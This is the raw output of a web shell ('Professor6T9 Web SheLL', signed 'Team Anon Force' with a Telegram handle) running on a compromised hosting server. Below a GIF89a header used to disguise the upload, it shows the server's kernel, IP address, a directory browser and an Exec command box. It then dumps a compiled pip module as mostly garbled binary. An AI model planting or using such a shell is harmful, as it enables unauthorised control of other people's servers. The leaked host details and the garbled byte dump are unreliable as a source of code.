GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux server326.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
67.223.118.122
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
cli
/
__pycache__
[ HOME ]
Exec
Submit
File Name : req_command.cpython-311.pyc
� L�ib@ � � � d Z ddlmZ ddlZddlZddlmZ ddlmZ ddl m Z mZmZ ddl mZmZmZ ddlmZ dd lmZ dd lmZ ddlmZ ddlmZ dd lmZmZmZ ddlmZ ddl m!Z! ddl"m#Z# ddl$m%Z% ddl&m'Z' ddl(m)Z) ddl*m+Z+ ddl,m-Z-m.Z.m/Z/m0Z0 ddl1m2Z2m3Z3 ddl4m5Z5 ddl6m7Z7 ddl8m9Z9 ddl:m;Z; ddl<m=Z= ddl>m?Z?m@Z@mAZA ejB eC� � ZDd1d!�ZEeAjF eAjG eAjH gZI ed"d#�$� � ZJd2d'�ZKd3d/�ZL G d0� d#e� � ZMdS )4z�Contains the RequirementCommand base class. This class is in a separate module so the commands that do not always need PackageFinder capability don't unnecessarily import the PackageFinder machinery and all its vendored dependencies, etc. � )�annotationsN)�partial)�Values)�Any�Callable�TypeVar)�BuildEnvironmentInstaller�"InprocessBuildEnvironmentInstaller�#SubprocessBuildEnvironmentInstaller)� WheelCache)� cmdoptions)�make_target_python)�IndexGroupCommand)�SessionCommandMixin)�CommandError�PreviousBuildDirError�UnsupportedPythonVersion)� LinkCollector)� PackageFinder)�SelectionPreferences)�TargetPython)� PipSession)�BuildTracker)�RequirementPreparer)�install_req_from_editable�install_req_from_line�#install_req_from_parsed_requirement�install_req_from_req_string)�PEP723Exception�pep723_metadata)�parse_dependency_groups)�parse_requirements)�InstallRequirement)�BaseResolver)�check_requires_python)� TempDirectory�TempDirectoryTypeRegistry� tempdir_kinds�optionsr �return�boolc �H � t j � d� � dk S )z� Check if regular constraints should be ignored because we are in a isolated build process and build constraints feature is enabled but no build constraints were passed. � _PIP_IN_BUILD_IGNORE_CONSTRAINTS�1)�os�environ�get�r) s �}/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/cli/req_command.py�!should_ignore_regular_constraintsr4 ; s � � �:�>�>�<�=�=��D�D� � _CommandT�RequirementCommand)�bound�func�-Callable[[_CommandT, Values, list[str]], int]c � � �� dd��d�� fd �}|S )zNDecorator for common logic related to managing temporary directories. �registryr'